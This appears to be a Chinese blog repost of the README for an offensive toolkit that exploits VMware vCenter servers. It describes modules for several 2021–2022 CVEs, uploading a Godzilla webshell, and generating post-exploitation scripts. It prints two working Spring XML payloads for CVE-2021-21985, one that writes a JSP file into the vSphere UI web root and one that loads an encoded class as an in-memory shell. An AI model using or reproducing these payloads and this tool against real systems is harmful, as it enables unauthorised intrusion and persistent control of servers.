Vcenter:综合渗透利用工具包

1. 使用说明(V 0.0.2)

1.1 安装与启动

推荐使用Python3.9,其余版本未测试,Linuxmac未测试。pip install -r requirements.txt python VcenterKit.py

1.2 信息收集模块

直接输入url即可进行信息搜集,如果存在本地文件读取的话,程序会自动读取数据库文件;有些网站是没有sdk接口的,也就无法通过这种方式来查询信息,后续会研究其他的方法:

图片[1]-Vcenter:综合渗透利用工具包-IT熊技术站

1.3 CVE-2021-21972模块

主要利用思维导图如下:

可以看到,并非所有情况下都能100%成功上传文件的,因此这里我把这些利用链(除了写authorized_keys)全部写在代码里面了,依次尝试。

图片[2]-Vcenter:综合渗透利用工具包-IT熊技术站

这里放上之前测试利用搭建的环境的截图:

图片[3]-Vcenter:综合渗透利用工具包-IT熊技术站

上传哥斯拉马:

图片[4]-Vcenter:综合渗透利用工具包-IT熊技术站

1.4 CVE-2021-21985模块

图片[5]-Vcenter:综合渗透利用工具包-IT熊技术站

需要注意的是,这里的RMICommand只能二选一填写,目前rmi由于测试环境的问题,还没有进行测试,可能会有问题,但是command目前测试下来没什么问题,这里放上一张之前写的时候测试的截图:

图片[6]-Vcenter:综合渗透利用工具包-IT熊技术站

需要注意的是,当前版本(v0.0.2)的shell上传和内存马打入模块还没实现。但是核心思想就是替换xml

以下参考:https://daidaitiehanhan.github.io/2022/04/18/vCenter2021几个漏洞及后渗透/#不出网利用

上传shellxml:<beans xmlns=”http://www.springframework.org/schema/beans” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xsi:schemaLocation=” http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd”> <bean id=”pb” class=”java.io.PrintWriter”> <constructor-arg> <value>/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/log2.jsp</value> </constructor-arg> </bean> <bean id=”is” class=”java.lang.String”> <constructor-arg> <value><![CDATA[<% out.println(“ok”); %> ]]></value> </constructor-arg> <property name=”whatever” value=”#{ pb.println(is).close()}”/> </bean> </beans>

打内存马要用到的xml:<beans xmlns=”http://www.springframework.org/schema/beans” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xsi:schemaLocation=” http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd”> <bean id=”pb” class=”com.sun.org.apache.bcel.internal.util.ClassLoader”> </bean> <bean id=”is” class=”java.lang.String”> <constructor-arg> <value><![CDATA[$$BCEL$$…]]></value> </constructor-arg> <property name=”whatever” value=”#{ pb.loadClass(is).newInstance()}”/> </bean> </beans>

等后面有时间了写上,当然,你可以来写,然后提pr,我看到会第一时间回复。

1.5 CVE-2021-22005模块

这里的shell name可写可不写,不写的话就是自动生成6位的名字。

图片[7]-Vcenter:综合渗透利用工具包-IT熊技术站

测试截图: 

图片[8]-Vcenter:综合渗透利用工具包-IT熊技术站

1.6 CVE-2022-22954

测试截图如下:

图片[9]-Vcenter:综合渗透利用工具包-IT熊技术站

1.7 CVE-2022-22972

图片[10]-Vcenter:综合渗透利用工具包-IT熊技术站

1.8 后渗透利用模块

本来是想把这些脚本集成到工具里面的,但是转念一想,没必要,直接弄成点按钮生成脚本到本地这种形式就可以了,这样直接一个工具走天下。

图片[11]-Vcenter:综合渗透利用工具包-IT熊技术站

1.9 渗透测试记事本

这里我放上去了一些打vcenter的时候常用的命令、常看的文章。

图片[12]-Vcenter:综合渗透利用工具包-IT熊技术站

项目地址

Vcenter:【GitHub

© 版权声明
THE END
喜欢就支持一下吧
点赞598赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容